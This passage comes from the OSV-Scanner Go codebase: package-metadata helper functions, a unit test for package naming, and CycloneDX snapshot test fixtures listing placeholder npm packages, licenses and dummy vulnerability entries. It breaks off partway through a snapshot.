ok := pkg.Metadata.(*archivemetadata.Metadata); ok { if metadata.ArtifactID != "" && metadata.GroupID != "" { return metadata.GroupID + ":" + metadata.ArtifactID } } // --- OS metadata --- if metadata, ok := pkg.Metadata.(*dpkgmetadata.Metadata); ok { // Debian uses source name on osv.dev // (fallback to using the normal name if source name is empty) if metadata.SourceName != "" { return metadata.SourceName } } if metadata, ok := pkg.Metadata.(*apkmetadata.Metadata); ok { if metadata.OriginName != "" { return metadata.OriginName } } if Ecosystem(pkg).String() == "GIT" && pkg.SourceCode != nil && pkg.SourceCode.Repo != "" { return pkg.SourceCode.Repo } return pkg.Name } func Ecosystem(pkg *extractor.Package) osvecosystem.Parsed { eco := pkg.Ecosystem() if metadata, ok := pkg.Metadata.(*osvscannerjson.Metadata); ok { newEco, err := osvecosystem.Parse(metadata.Ecosystem) if err != nil { cmdlogger.Warnf("Warning: error parsing osvscanner.json ecosystem: %s", err.Error()) return eco } eco = newEco } // TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete if purlCache := toCachedPackageInfo(pkg); purlCache != nil { newEco, err := osvecosystem.Parse(purlCache.Ecosystem) if err != nil { cmdlogger.Warnf("Warning: error parsing osvscanner.json ecosystem: %s", err.Error()) return eco } eco = newEco } return eco } func Version(pkg *extractor.Package) string { // TODO(v2): SBOM special case, to be removed after PURL to ESI conversion within each extractor is complete if purlCache := toCachedPackageInfo(pkg); purlCache != nil { return purlCache.Version } // Assume Go stdlib patch version as the latest version // // This is done because go1.20 and earlier do not support patch // version in go.mod file, and will fail to build. // // However, if we assume patch version as .0, this will cause a lot of // false positives. This compromise still allows osv-scanner to pick up // when the user is using a minor version that is out-of-support. if Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && Name(pkg) == "stdlib" { v := semverlike.ParseSemverLikeVersion(pkg.Version, 3) if len(v.Components) == 2 { return fmt.Sprintf( "%d.%d.%d", v.Components.Fetch(0), v.Components.Fetch(1), 99, ) } } return pkg.Version } func Location(pkg *extractor.Package) string { return pkg.Location.PathOrEmpty() } func Commit(pkg *extractor.Package) string { if pkg.SourceCode != nil { return pkg.SourceCode.Commit } return "" } func SourceType(pkg *extractor.Package) models.SourceType { for _, extractorName := range pkg.Plugins { if strings.HasPrefix(extractorName, "os/") { return models.SourceTypeOSPackage } else if _, ok := scalibrplugin.ExtractorPresets["sbom"][extractorName]; ok { return models.SourceTypeSBOM } else if _, ok := gitExtractors[extractorName]; ok { return models.SourceTypeGit } else if _, ok := scalibrplugin.ExtractorPresets["artifact"][extractorName]; ok { return models.SourceTypeArtifact } else if _, ok := scalibrplugin.ExtractorPresets["lockfile"][extractorName]; ok { return models.SourceTypeProjectPackage } } return models.SourceTypeUnknown } func DepGroups(pkg *extractor.Package) []string { if dg, ok := pkg.Metadata.(scalibrosv.DepGroups); ok { return dg.DepGroups() } return []string{} } func OSPackageName(pkg *extractor.Package) string { if metadata, ok := pkg.Metadata.(*apkmetadata.Metadata); ok { return metadata.PackageName } if metadata, ok := pkg.Metadata.(*dpkgmetadata.Metadata); ok { return metadata.PackageName } if metadata, ok := pkg.Metadata.(*rpmmetadata.Metadata); ok { return metadata.PackageName } return "" } ================================================ FILE: internal/imodels/imodels_test.go ================================================ package imodels import ( "testing" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" ) func Test_Name(t *testing.T) { t.Parallel() tests := []struct { name string pkg *extractor.Package want string }{ { name: "Regular_package", pkg: &extractor.Package{ Name: "regular-pkg", }, want: "regular-pkg", }, { name: "GIT_ecosystem_with_repo", pkg: &extractor.Package{ Name: "openssl@3.5", SourceCode: &extractor.SourceCodeIdentifier{ Repo: "github.com/openssl/openssl", }, Metadata: &osvscannerjson.Metadata{ Ecosystem: "GIT", }, }, want: "github.com/openssl/openssl", }, { name: "GIT_ecosystem_without_repo", pkg: &extractor.Package{ Name: "openssl@3.5", SourceCode: &extractor.SourceCodeIdentifier{ Repo: "", }, Metadata: &osvscannerjson.Metadata{ Ecosystem: "GIT", }, }, want: "openssl@3.5", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := Name(tt.pkg); got != tt.want { t.Errorf("Name(*extractor.Package) = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/imodels/results/scanresults.go ================================================ // Package results defines the data structures for scan results. package results import ( spb "github.com/google/osv-scalibr/binary/proto/scan_result_go_proto" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scanner/v2/internal/config" ) // ScanResults represents the complete results of a scan. // This includes information that affect multiple packages. type ScanResults struct { Inventory inventory.Inventory PackageScanResults []*extractor.Package // TODO(v2): Temporarily commented out until ScanParameters is moved // to a shared package to avoid cyclic dependencies // The user parameters for the scan // ScanParameters // Scan config ConfigManager config.Manager // For container scanning, metadata including layer information ImageMetadata *spb.ContainerImageMetadata } ================================================ FILE: internal/output/__snapshots__/cyclonedx_test.snap ================================================ [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX14_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": 